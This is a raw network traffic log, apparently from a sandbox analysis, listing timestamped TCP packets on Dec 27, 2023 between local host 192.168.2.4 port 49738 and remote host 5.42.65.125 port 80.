Dec 27, 2023 17:57:25.916405916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.916418076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916424036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.916433096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916449070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.916984081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.916996956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917028904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.917054892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917068958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917113066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.917125940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917140007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917165041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.917252064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917264938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917277098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917289019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917292118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.917303085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917304993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.917340040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917354107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917354107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.917362928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917376995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917390108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917412043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.917413950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.917422056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.917467117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.918173075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918301105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918313980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918355942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918370962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918381929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918390036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.918395996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918425083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.918448925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918462992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918469906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918477058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.918534040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.919089079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919101954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919145107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.919204950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919224024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919236898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919243097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919250011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919253111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.919258118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919265032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919312954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.919317007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919331074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919337988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.919419050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.920077085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920121908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.920126915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920140982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920149088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920156002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920217037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.920291901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920305014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920315981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920322895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920331001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920344114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920351982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.920443058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.921035051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921109915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.921148062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921160936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921168089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921217918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.921247959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921288013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.921385050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921443939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921458006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921472073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921490908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.921515942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.921530008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921542883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921550035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921556950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921562910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921571970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921578884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.921669960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.922240973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922254086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922322989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.922466040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922486067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922498941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922511101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922522068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.922524929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922538042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922545910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922552109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922552109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.922560930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922573090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.922597885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.922636032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.923193932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923213959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923233032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923258066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.923279047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.923280954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923295021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923302889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923310041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923317909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923350096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.923401117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923418045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923429966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923443079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.923465014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.923480034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.924259901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924274921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924287081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924299955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924313068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924313068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.924344063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.924426079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924441099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924453020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924467087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924479008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924488068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.924494028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924506903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.924518108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.924546003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.925319910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925333023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925340891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925369024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925400019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.925422907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925437927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925458908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.925482035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925493956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925503016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925509930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925518036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925553083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.925565004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925573111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925580025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.925640106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.927898884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.927946091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.927989006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.927999973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928004980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928020954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928025961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928060055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928111076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928127050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928139925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928153038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928164959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928168058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928183079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928195953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928203106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928210974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928217888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928230047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928232908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928245068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928251982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928272963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928283930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928297997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928309917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928324938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928342104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928349018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928364038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928376913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928385019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928389072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928399086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928409100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928447962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928448915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928462029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928476095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928489923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928500891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928503990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928529024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928530931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928546906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928560019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928570986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928572893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928590059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.928591967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928606987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.928634882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.929410934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.929425955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.929455042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.946481943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.956948042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.956968069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.956984043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.956994057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957084894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.957110882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957125902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957155943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957165003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.957191944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.957194090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957210064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957313061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957326889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957340002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957346916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957346916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.957355976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957369089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957395077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957401037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.957408905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957416058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957422972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957422972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.957432032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957438946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957453966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957462072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957470894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957478046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957479000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.957487106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.957518101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.958461046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958477020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958488941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958506107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958513975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.958543062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.958606958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958622932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958640099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958647966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.958656073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958678007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.958683968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958698988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958707094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958714008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958723068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.958755970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.958833933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.959069967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959095001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959110022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959120035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959147930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.959153891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959176064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959189892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959202051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.959206104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959218025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.959281921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.959287882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959305048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959312916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959320068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959330082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.959417105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.960050106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960103989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.960119009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960150003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960163116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960201979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.960273981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960289955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960298061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960305929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960314035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960326910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960335016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960354090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.960400105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.960747004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960762024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960794926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960805893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.960808992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960827112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960845947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.960913897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960930109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960937977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960946083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960952997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960971117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960983992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.960989952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.960999012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.961016893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.962794065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962810040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962822914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962838888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962840080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.962855101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962861061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.962902069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962914944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962915897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.962924957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962932110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.962939978 CET	80	49738	5.42.65.125	192.168.2.4
